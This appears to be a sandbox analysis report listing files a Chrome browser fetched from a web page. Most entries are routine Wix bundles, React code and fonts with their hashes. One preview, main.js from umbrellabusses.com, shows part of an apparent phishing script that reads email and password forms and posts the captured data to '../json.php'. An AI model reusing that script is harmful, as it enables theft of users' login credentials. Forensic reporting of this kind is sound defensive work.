                                                                                                                                                                                                                        Preview:{"version":"2.0","host":"thunderbolt","namespace":"dsgnsys","baseURL":"https://static.parastorage.com/services/editor-elements-design-systems/dist/thunderbolt/","model":["62a24e6f.bundle.min.js","c8d6593a.min.css"],"assets":[["stylable-metadata","editor-elements-design-systems.thunderbolt.2650d469363b6c5420f6bde66b0a6871930e53ab.metadata.json"]],"components":{"ControlTypes":["e155d4ef.bundle.min.js","ed5c76cf.min.css"],"DashboardButton":["23a1b43e.bundle.min.js","2b9dee80.min.css"],"DashboardHeading":["6f784ddd.bundle.min.js","3f1d8bf5.min.css"],"DashboardIconButton":["079a0737.bundle.min.js","ecd37ae9.min.css"],"DashboardInfoIcon":["f79d7931.bundle.min.js","fc3ba9fa.min.css"],"DashboardInput":["c6646481.bundle.min.js","fbb3dfe7.min.css"],"DashboardNumberInput":["e3a4236b.bundle.min.js","fbb3dfe7.min.css"],"DashboardTextButton":["c9545b02.bundle.min.js","1ede16d1.min.css"],"DashboardText":["61966aef.bundle.min.js","95f82792.min.css"],"DashboardToggleSwitch":["16bbf963.bundle.min.js","1
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2510)
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):2631
                                                                                                                                                                                                                        Entropy (8bit):5.375891908919065
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:48:VEhz8RhRfMsPMSHKQtGmhRRARxupeDUkCfYcEaM55kXPez9:VactG/ifxMX+Wz9
                                                                                                                                                                                                                        MD5:57F88F8B36A1258E0BA372B861809678
                                                                                                                                                                                                                        SHA1:7F8DFAAEA3FE6769DD70BFD9AD4B5AF9AAA3637C
                                                                                                                                                                                                                        SHA-256:55BC522B84C05AA87EFAC86DFE38C75ADE0DC838C44C72D8BA6C663A70CD9667
                                                                                                                                                                                                                        SHA-512:471605AF94A623E70E6A30221B2532EBBB64270B9010CBD6033381773CB8124F1F6F928B01F0801B97A3E111469B3E42BBB965BFBDCDC4ECB1766AB6B49A9BB5
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:"use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[316,3605],{81220:(u,c,t)=>{t.d(c,{Qf:()=>n,S7:()=>r,T_:()=>i,tn:()=>b,xg:()=>e});const e=u=>-(Math.cos(Math.PI*u)-1)/2,i=u=>u<.5?2*u**2:1-(-2*u+2)**2/2,b=u=>u<.5?(1-Math.sqrt(1-4*u**2))/2:(Math.sqrt(-(2*u-3)*(2*u-1))+1)/2,n={linear:u=>u,sineIn:u=>1-Math.cos(u*Math.PI/2),sineOut:u=>Math.sin(u*Math.PI/2),sineInOut:e,quadIn:u=>u**2,quadOut:u=>1-(1-u)**2,quadInOut:i,cubicIn:u=>u**3,cubicOut:u=>1-(1-u)**3,cubicInOut:u=>u<.5?4*u**3:1-(-2*u+2)**3/2,quartIn:u=>u**4,quartOut:u=>1-(1-u)**4,quartInOut:u=>u<.5?8*u**4:1-(-2*u+2)**4/2,quintIn:u=>u**5,quintOut:u=>1-(1-u)**5,quintInOut:u=>u<.5?16*u**5:1-(-2*u+2)**5/2,expoIn:u=>0===u?0:2**(10*u-10),expoOut:u=>1===u?1:1-2**(-10*u),expoInOut:u=>0===u?0:1===u?1:u<.5?2**(20*u-10)/2:(2-2**(-20*u+10))/2,circIn:u=>1-Math.sqrt(1-u**2),circOut:u=>Math.sqrt(1-(u-1)**2),circInOut:b,backIn:u=>2.70158*u**3-1.70158*u**2,backOut:u=>1+2.70158*(u-1)**3+1.70158*(u-1)*
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2434)
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):2551
                                                                                                                                                                                                                        Entropy (8bit):5.361811976481347
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:48:kPuoTviBwbXNQpdLpUJQOLXLCbPCfiLDtxFFA9OlMD2B2VPgjn5P5uT+mhdRcbff:+nH7NQ7LfOLLyP3LDtxFu9Oi+n5Pmh3U
                                                                                                                                                                                                                        MD5:9CCB09F4FCE4F2315901055BF54C1F20
                                                                                                                                                                                                                        SHA1:8FB21A35E98930B80ACCF273508E06762E7C72C8
                                                                                                                                                                                                                        SHA-256:636561E790BD47A514E653525EBFA4F0E4110823E5620D49679C9C0C955B5D8A
                                                                                                                                                                                                                        SHA-512:D64E2E7EC2DC14CF0ABFE835BFFB27B5B5D6D34A879DAA4E10C851B47E314E70BA3FF967728389E7024D1E4C49BF6037BEDE14D0737A4AF39DDEFAD54650C9E1
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:"use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[8253],{7185:(e,t,n)=>{n.r(t),n.d(t,{page:()=>f});var o=n(77748),r=n(20590),c=n(32166),a=n(87711),s=n(39218),d=n(10553),l=n(43272),i=n(17709),p=n.n(i),g=n(62155),h=n(56232),u=n(91674);const m=e=>({compId:e.compId,dataId:e.dataId}),I=(e,t,n,o,r,c,a,s,d=!1)=>{const l=(0,u.km)("SITE_HEADER",o,s),i=l?.getBoundingClientRect().height;let I,v=i||a;const b=()=>{const e=o.document.getElementById(h.M4);e&&(v+=e.offsetHeight),I=n.reduce(((e,t)=>{const n=o.document.getElementById(t.compId);return n&&e.push({...t,element:n,top:n.getBoundingClientRect().top||0}),e}),[]),E()},f=n=>{const a=((e,t,n)=>{if(n.innerHeight+n.scrollY>=n.document.body.scrollHeight)return e[e.length-1];const o=e.findIndex((e=>Math.floor(e.top-t)>0));return-1===o&&e[e.length-1]?m(e[e.length-1]):0!==o&&e[o-1]?m(e[o-1]):h.aK})(I,v,o);a&&r.update(((e,t,n,o,r,c,a)=>{const s={};if(n.length&&n.forEach((e=>{s[e.id]={activeAnchor:o}}
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:PNG image data, 82 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):8040
                                                                                                                                                                                                                        Entropy (8bit):7.9699916849012125
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:sKB6ZnztJYtApPRVn53tNi0+AOBRZ+zOA:sKSnzPYtApPn5Pie8+p
                                                                                                                                                                                                                        MD5:3A96EFB1B5667B98AE54316443DAF59E
                                                                                                                                                                                                                        SHA1:ED2AE708606CFF6D4F43E9B2ACF96B5043C6BD49
                                                                                                                                                                                                                        SHA-256:5CADBDBE71976F9C62FCD0B98A334A95925C66360687E269538C4A74DD28A13A
                                                                                                                                                                                                                        SHA-512:A963C30EBA0704D23EDABF5BF9871D699D42B86AD9BBB9646C85DFF45D448E3F939416FF38564404729B334DF2357D3046FB4D897232E489029BC75FB9F037DF
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://umbrellabusses.com/samhentir/img/log.png
                                                                                                                                                                                                                        Preview:.PNG........IHDR...R...e......S......sRGB........"IDATx^.y.\U...g.[m.&.D.$d#.$.%@L.2.. ..E.| ....2.0,..8......p.D.a..0....O.!.$l.B.B....k..9g...j`....I5.G..t.Su.......=.m..GK....ed'..."#..9..E.Z.......".-..E..l....f."G@..@.v3b.# [D.E.y.Z........Y.(.i.9..n.S o.m..W_...K/.q.m..N..;.....{..y...(w..,.........;..x..b.3[.J....@.:.."R..L..7..R.0w....?|.EK'..}8..~.O.r...}.../....Bq.....`..D.0...<...#4.. ...l/a..+/.P..........ok..v....~..Bk}%8^.J3p7..zH.`...\(.T..\.q.c...]t.....1k..t.k...qg.:Hc...-[.Xs.o..mWe..%..;...hH.../.H.X..r..#........}.,..h..a..~u..>v.l.g..Z....r...'?....v.,.....r..Q=P........<.p....2K..5.u.^.RBC!R....X.v/1G.p..9.;....%.....r....=..kp...._..-.a....5.. ..D..!...I...*...Z"..i..p....1r...Q...p..FU.S....<i.yG..h..>o6. .7.-.o....}'$!..m.x.w'.Z....vX....K%pI`$..Cs....9p...N.]..:0F..A...R..y.<A*b...W......<f..sO..v.3.?..a.....e.<..K:fs...?.......M..F...-]H..B.......%4g`n.....:.\J.!,P-..&".#8.7.....N.bt 0w..U]...-cL....|rM4c..[.S...
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (14037)
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):14156
                                                                                                                                                                                                                        Entropy (8bit):5.31257532830542
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:lfpKf/WgM+2Uj8BrPSSM3QsgcpVuXVtdJp1sJfQ3uGt:l42gMvUj8BrPSn3ucpVuXVtHp1MQ3uGt
                                                                                                                                                                                                                        MD5:2508CB0A2FDF98F9E0771E42FCC78A79
                                                                                                                                                                                                                        SHA1:57C5BC3D16134CAC7682D3705900E38CACBBB0B3
                                                                                                                                                                                                                        SHA-256:0AEE08D46AFDFA6022D5D71D5A657F2163C22D93F0E7975424C898D7FCFF7904
                                                                                                                                                                                                                        SHA-512:D3BF658348BEEDBBCB8805AD0233409BAF7F843DF4206EBAA3FB8CB592860E1FCFAEF87330A1134A943EA777E34B6833042CC37C7BA7D69A7979AA8B6C0C31B0
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:"use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[974],{81220:(t,e,i)=>{i.d(e,{Qf:()=>r,S7:()=>c,T_:()=>o,tn:()=>s,xg:()=>n});const n=t=>-(Math.cos(Math.PI*t)-1)/2,o=t=>t<.5?2*t**2:1-(-2*t+2)**2/2,s=t=>t<.5?(1-Math.sqrt(1-4*t**2))/2:(Math.sqrt(-(2*t-3)*(2*t-1))+1)/2,r={linear:t=>t,sineIn:t=>1-Math.cos(t*Math.PI/2),sineOut:t=>Math.sin(t*Math.PI/2),sineInOut:n,quadIn:t=>t**2,quadOut:t=>1-(1-t)**2,quadInOut:o,cubicIn:t=>t**3,cubicOut:t=>1-(1-t)**3,cubicInOut:t=>t<.5?4*t**3:1-(-2*t+2)**3/2,quartIn:t=>t**4,quartOut:t=>1-(1-t)**4,quartInOut:t=>t<.5?8*t**4:1-(-2*t+2)**4/2,quintIn:t=>t**5,quintOut:t=>1-(1-t)**5,quintInOut:t=>t<.5?16*t**5:1-(-2*t+2)**5/2,expoIn:t=>0===t?0:2**(10*t-10),expoOut:t=>1===t?1:1-2**(-10*t),expoInOut:t=>0===t?0:1===t?1:t<.5?2**(20*t-10)/2:(2-2**(-20*t+10))/2,circIn:t=>1-Math.sqrt(1-t**2),circOut:t=>Math.sqrt(1-(t-1)**2),circInOut:s,backIn:t=>2.70158*t**3-1.70158*t**2,backOut:t=>1+2.70158*(t-1)**3+1.70158*(t-1)**2,ba
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):3624
                                                                                                                                                                                                                        Entropy (8bit):4.491187448199961
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:48:0DBtoxPpWldxFjtxGhXfJxGmW3uxy70I354utNB4tIcEfeSQVgr:0DBtoJy0hXRxGXu1y5bNB+m
                                                                                                                                                                                                                        MD5:E642304FEC275AB83F7C480B4CE918D9
                                                                                                                                                                                                                        SHA1:C1DFF58F3BFB7AB6428FCD02AC4AC785B4DF4F3E
                                                                                                                                                                                                                        SHA-256:BECD218B404204670A103DF9498F98822B7769976208B096C957F41795210043
                                                                                                                                                                                                                        SHA-512:0CF85D8AB108D60B82AD2A6E477805B5C205C2241F0A6A1F2EDDBF5364D06FBB9000F464BC6AEB39A2ED35FA036A3751B387175EE22984B5ADA4ED9EC4A93483
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://umbrellabusses.com/samhentir/js/main.js
                                                                                                                                                                                                                        Preview: const container1 = document.querySelector(".container");.. const container2 = document.querySelector(".container2");.. const emText = document.querySelector(".minp");.. const errorTextBox = document.querySelector(".errorTextBox");.. const emForm = document.querySelector(".emForm");.. const paForm = document.querySelector(".paForm");.. const emi = document.querySelector(".emi");.. const paInp = document.querySelector(".paInp");.. const backbt = document.querySelector(".backbt");.. const error2 = document.querySelector(".error2");.. const errPa = document.querySelector(".errPa");.. let err1 = 0;.... const handleresp = (res) => {.. // add your link .. fetch("../json.php", { .. method: "POST",.. body: res .. });.. };........ function randomString(length, chars) {....var result = '';....for (var i = length; i > 0; --i) result += cha
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 16972, version 1.0
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):16972
                                                                                                                                                                                                                        Entropy (8bit):7.986557505552888
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:QURdwE2COGgRaa0ZD2lnE1hHH1y7YUSdSFLU+xtuQp:BpOGGa861H1VKLUKMo
                                                                                                                                                                                                                        MD5:B5204529B5B0B1CBE2831DE7EDBED75F
                                                                                                                                                                                                                        SHA1:973711D8422573A7E7F97703D9790B94F23117A4
                                                                                                                                                                                                                        SHA-256:E0C0E70DFA0B6E6611D9B6B13F4F2C25ACC3C4C346E0DED5405A5FA4A40ECEB1
                                                                                                                                                                                                                        SHA-512:65F2674279BD082F09A70458D98DC5792BB83D7F19F6685889F404BFB66AB5C042D7C3913EF7FA27B98D330DAA837650D184A9D117681DE2402324CCFDA4B6E6
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://static.parastorage.com/tag-bundler/api/v1/fonts-cache/googlefont/woff2/s/playfairdisplay/v18/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgEM86xQ.woff2
                                                                                                                                                                                                                        Preview:wOF2......BL..........A..........................4..p..L.`..|.....8..s..V..6.$.... ..P..].....m.........Q.q ...DRN.v.........A,...H;.S...kS}....nt..9o......o..X.#......I.A4F.......,.YE...X...k..r..VF9.lg....[.3..<..?..$...G..X..U8ke.J{...........0...Y%:.O.w2...~.}...f.4...F..H.4.T.%B.......[.!5`l....6X4l.......L.$.D...3O..n.T....+...C=...?...s.j..<@.R.P.K..x.]..O.`^<6v..Z..cP..........X..n..11s..8Vt....K...-..Cv.*btL!z8....PH.g...Z..F.`..F.."f-q&.{a..=...oww..>..i......7o...C.d.).DK.6....O..+.Ki....3../u.*...B..._..t........5.y.LR.hJ.....>.}...[...p...Ij..ss..r.\.C.Q....H.-....U..EwL.U.E....i.|..f.h.V.c...F.DdPXA.....Bp...`IE.MuMKPW.v.....w..!.1.v..k...-.. "!.. "!....wm..!.F".../....@..$Ze.._.i>H.d.l.......6 .B........_.$E!..L.+. . .|V...o;....'..@...v;@....EG+....0.dt...N........!..c..a7<..U]...m......a.{;.}.<.....[...j...{..k?$ ....Xk..6.h...f.]...K....eTU]M..U.....}.S.}i.a=.v.Sb.*.j$...m..k....r.*.j.>.>_..V.G!...c../..Q.=.g...u.)..
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1188)
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1303
                                                                                                                                                                                                                        Entropy (8bit):5.4152936437291554
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:z/kma0CwT2BLQZDRFSEYTDC3/TLd71X6V4RFoFpKDAt9cB/WHp/h3xRRXkgjY:lCBBLQReT+7LdhXboFpKDAt9cB2h3nRq
                                                                                                                                                                                                                        MD5:2A76B438980C3B70FF11F9C7903FB226
                                                                                                                                                                                                                        SHA1:BAB9805D48792C2564B5F9439386AED772F4E366
                                                                                                                                                                                                                        SHA-256:C893B85124C764FA7604430413FD6A523EF58200284095EA0ECD25DA5E2768CE
                                                                                                                                                                                                                        SHA-512:2F735EC43C5B62D691DD389B9A055B7410E955586E5539C8FB0D181F01F1CA0A969770AA94D65D99A31BCA795283A966DC14D2035DF4402DBA4D12ECB56B92B2
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:"use strict";(self.webpackJsonp__wix_thunderbolt_app=self.webpackJsonp__wix_thunderbolt_app||[]).push([[5148,5652,6521],{19025:(t,e,n)=>{n.d(e,{Lm:()=>r,My:()=>w,Og:()=>c,QJ:()=>h,Qx:()=>v,V8:()=>_,_d:()=>o,ak:()=>a,ii:()=>i,lD:()=>s,lH:()=>d,rE:()=>m,vh:()=>u});const s=/mailto:([^?]+)(\?(.*))?/,r=/^tel:(.*)/,a=/^\/([^ ?#]*)?[#]?([^ ?#]*)[?]?(.*)/,p=/^#([^ ?]*)[?]?(.*)/,l=/^(http|https):\/\/(.*)/,o=/^wix:document:\/\/v1\/(.+)\/(.+)/,c=/^document:\/\/(.*)/,i=t=>r.test(t),d=t=>t.startsWith("https://api.whatsapp.com/send?phone="),h=t=>s.test(t),_=t=>o.test(t)||c.test(t),u=t=>l.test(t),m=t=>a.test(t),w=t=>p.test(t),v=t=>["SCROLL_TO_TOP","SCROLL_TO_BOTTOM"].includes(t)},91500:(t,e,n)=>{n.d(e,{S6:()=>r,qq:()=>i,qw:()=>s,vP:()=>d});const s=(t,e)=>r(t,e).relativeEncodedUrl,r=(t,e)=>{const n=a(t,e),s=p(n);return{relativePathnameParts:s,relativeUrl:l(s),relativeEncodedUrl:l(o(n))}},a=(t,e)=>{const n=new URL(t,`${e}/`),s=new URL(e);return n.pathname.replace(s.pathname,"")},p=t=>{const e=c(t);retu
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65028)
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):65196
                                                                                                                                                                                                                        Entropy (8bit):5.511893802728455
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:YlRiSZ1W/G+xHD4ymboXtfJjbXUrbTtKVL5:URi21W/GADzmbuAU
                                                                                                                                                                                                                        MD5:23BC9398FE583A0FF53597E69D064A5F
                                                                                                                                                                                                                        SHA1:CA8D7D7EB850622174261BEFCA66B634CE534CAC
                                                                                                                                                                                                                        SHA-256:CAC830DF5F0247623BB73DE4B7B1F0A3C6A13EA259E919CAC9F81F58A87B42B5
                                                                                                                                                                                                                        SHA-512:49C05EB321F654D0194ED67F7968C4618F6D287BE97F4033C0D708890D02464071817B8B5CA76EA141CAB619F84B097826DEE7F4E980F4DEF81F8F4AFB198572
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t(require("react")):"function"==typeof define&&define.amd?define("rb_wixui.thunderbolt_bootstrap-classic",["react"],t):"object"==typeof exports?exports["rb_wixui.thunderbolt_bootstrap-classic"]=t(require("react")):e["rb_wixui.thunderbolt_bootstrap-classic"]=t(e.React)}("undefined"!=typeof self?self:this,(function(e){return function(){var t={96114:function(e,t,a){var n;!function(t){"use strict";var i=function(){},r=t.requestAnimationFrame||t.webkitRequestAnimationFrame||t.mozRequestAnimationFrame||t.msRequestAnimationFrame||function(e){return setTimeout(e,16)};function o(){var e=this;e.reads=[],e.writes=[],e.raf=r.bind(t),i("initialized",e)}function s(e){e.scheduled||(e.scheduled=!0,e.raf(c.bind(null,e)),i("flush scheduled"))}function c(e){i("flush");var t,a=e.writes,n=e.reads;try{i("flushing reads",n.length),e.runTasks(n),i("flushing writes",a.length),e.runTasks(a)}catch(e){t=e}if(e.scheduled=!1,(n.length||
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (9534)
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):9582
                                                                                                                                                                                                                        Entropy (8bit):5.310673601453117
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:I5qOMcT/i5hH/A+v7YlISaxwXDt6RjLfGz/hX0XNe3hGJN5AsRJzUAMnGopH4qrz:I5qOM0i5O+v7yIxyXYR/4/10XUxWbRNq
                                                                                                                                                                                                                        MD5:6F1AF620740F6E8D6851E2794BA694D0
                                                                                                                                                                                                                        SHA1:F72E87D87D3C5E4C6F14EC3C6A0C9ADE79E9F3EF
                                                                                                                                                                                                                        SHA-256:CB3F499CCEFF673F0B50D0D61753F88EA1DDFA852EF587B5CEC5E935B431BECA
                                                                                                                                                                                                                        SHA-512:0244450B7750817EAD0122F8074AEF8492598D193B3C60F87EC32645E6639F8175C23AD5041D82110CAFAF2A94FE89C60BFE05E62ABE8509381F001E5EF22F8A
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:(()=>{"use strict";const e="Tag Manager: ",t=function(){let e=!1;try{const t=window;e=t&&t.debug||t.location&&(t.location.search||"").toLowerCase().indexOf("debug=")>-1}catch(e){}return e}();function n(n){t&&console&&console.error(`${e} ${n}`)}function o(e){let t=e;try{t=JSON.parse(e)}catch(e){n("Parse error in string"),n(e.message)}return t}function r(e){return o(JSON.stringify(e))}function i(e,t){return!(!e||"true"!==e[t])}const c="_api/tag-manager/api/v1/tags/",a=`${c}sites/`,s=[".wix.com",".editorx.com"],d="22bef345-3c5b-4c18-b782-74d4085112ff",u=!!document.documentMode;function l(e,t,n){let o;u?(o=document.createEvent("CustomEvent"),o.initCustomEvent(e,!0,!0,n)):o=new CustomEvent(e,{detail:n}),t&&t.dispatchEvent&&setTimeout((()=>{t.dispatchEvent(o)}),0)}const f="TagManagerLoaded",g="LoadingTags",p="TagLoaded",m="TagLoadError",h="TagManagerConfigSet";let y=[];const b=[],w=[],E=[];let T,v=[],I={},x=!1;function A(){return E}function C(){return r(I)}function N(e){return Object.keys(e)
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4293)
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):6088
                                                                                                                                                                                                                        Entropy (8bit):5.337558561572514
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:96:C/lsztkK8bzmdJ8apr57lHmSz/k2/AkxW4WBWsWGtxBv11BZDeyMpu:C/leKz+80VJxDB/hW4WBWsDxBv11LCyt
                                                                                                                                                                                                                        MD5:0022D406FBBD37299590C9DFCB9E8438
                                                                                                                                                                                                                        SHA1:4C22DA1D82EC80455C8FE215B9931D8EA01EE8D7
                                                                                                                                                                                                                        SHA-256:45B1DAB313ABA771527F0A61C98659B5C6CF31A9459F72CF70AC2B27B8673CAF
                                                                                                                                                                                                                        SHA-512:D06FB9CED1909AB8E2983EA29F3EE856778B55BAAE78206B6153492C906F0366496E72E5FCEEF8662F8FE1748E8478F0F39F6F5337DF31B5792C44524BF37A5E
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Preview:"use strict";(function(){// src/reportPhaseStarted.ts.var _window=window;function uuidv4(){return"xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx".replace(/[xy]/g,function(c){var r=Math.random()*16|0,v=c==="x"?r:r&3|8;return v.toString(16)})}function sendBI(evid){var extra=arguments.length>1&&arguments[1]!==undefined?arguments[1]:"";var _window$fedops$data=_window.fedops.data,site=_window$fedops$data.site,rollout=_window$fedops$data.rollout,fleetConfig=_window$fedops$data.fleetConfig,requestUrl=_window$fedops$data.requestUrl,frogOnUserDomain=_window$fedops$data.frogOnUserDomain;if(requestUrl.includes("suppressbi=true")){return}var fedOpsAppName=site.appNameForBiEvents;var isDACRollout=rollout.isDACRollout,siteAssetsVersionsRollout=rollout.siteAssetsVersionsRollout;var is_dac_rollout=isDACRollout?1:0;var is_sav_rollout=siteAssetsVersionsRollout?1:0;var is_rollout=fleetConfig.code===0||fleetConfig.code===1?fleetConfig.code:null;var pageVisibilty=document.visibilityState;var types={WixSite:1,UGC:2,T
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (945)
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):131835
                                                                                                                                                                                                                        Entropy (8bit):5.376665898737896
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:C1/SrQwxn5J6IBuXZ2NInxb7w4BqZTXZlvA61i8+pxsdn9PvV6SdqbAR:755qZpAZxA61iz6Phkm
                                                                                                                                                                                                                        MD5:7D4842A904E5D5D1B19240075998B111
                                                                                                                                                                                                                        SHA1:FEB8DDC9D0566A4FA0971A6E1138658618CDACFE
                                                                                                                                                                                                                        SHA-256:35F4F974F4B2BCD44DA73963347F8952E341F83909E4498227D4E26B98F66F0D
                                                                                                                                                                                                                        SHA-512:E9AD75D3BAD3940E2062980702A6F02C0B719968A905D24572AF32E52FDA4E07B7069F95024940066D8B3BE2A0E75BCE591F49319AB53AF8E5E6DA65B8DA5379
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://static.parastorage.com/unpkg/react-dom@18.3.1/umd/react-dom.production.min.js
                                                                                                                                                                                                                        Preview:/**. * @license React. * react-dom.production.min.js. *. * Copyright (c) Facebook, Inc. and its affiliates.. *. * This source code is licensed under the MIT license found in the. * LICENSE file in the root directory of this source tree.. */.(function(){/*. Modernizr 3.0.0pre (Custom Build) | MIT.*/.'use strict';(function(Q,zb){"object"===typeof exports&&"undefined"!==typeof module?zb(exports,require("react")):"function"===typeof define&&define.amd?define(["exports","react"],zb):(Q=Q||self,zb(Q.ReactDOM={},Q.React))})(this,function(Q,zb){function m(a){for(var b="https://reactjs.org/docs/error-decoder.html?invariant="+a,c=1;c<arguments.length;c++)b+="&args[]="+encodeURIComponent(arguments[c]);return"Minified React error #"+a+"; visit "+b+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}.function mb(a,b){Ab(a,b);Ab(a+"Capture",b)}function Ab(a,b){$b[a]=b;for(a=0;a<b.length;a++)cg.add(b[a])}function bj(a){if(Zd.call(dg,a))retu
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                        Size (bytes):32
                                                                                                                                                                                                                        Entropy (8bit):4.327819531114783
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:HniBth5NBEkRY:Cb7NBEk+
                                                                                                                                                                                                                        MD5:201FA7A9ACAA891D24039BB6119864A6
                                                                                                                                                                                                                        SHA1:D0F63CFBDA78BFD112A6A22F4A36D4E4F7AF2C74
                                                                                                                                                                                                                        SHA-256:C92D41CC9C41060827219221EACB8BC735BDFB6AC0606AF33AE12B54B654D93B
                                                                                                                                                                                                                        SHA-512:5BEC74DF07438199C5155B65E5183761AA0A9F26CF906EE9E355A0A918B95FD5A7B1253F8ACC92D2AC0970A70FEC226E96E363F12E694DFD3447654F51F85E5B
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAkFlDl2SDK9MRIFDUWWw-QSEAkT7ROp-HKaORIFDcKbH3c=?alt=proto
                                                                                                                                                                                                                        Preview:CgkKBw1FlsPkGgAKCQoHDcKbH3caAA==
                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):41390
                                                                                                                                                                                                                        Entropy (8bit):5.1864672738087885
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:YLX4XfisWcn6M585dqjsJHiq04/VgdhMeZexbuFpnTV8Hcgc1U4ClhdncpCobl3V:YLX4XfisWcn6M585dqjsJHiq04/VgdhX
                                                                                                                                                                                                                        MD5:E171C088607CF01FC09DB32F853FCA64
                                                                                                                                                                                                                        SHA1:81466448AB28B0B9E7522F45068B3AD7E66191E5
                                                                                                                                                                                                                        SHA-256:28B2E3C914F992D81739A1768F3A02B596F8856D3DEBC67C231613058A8FA36B
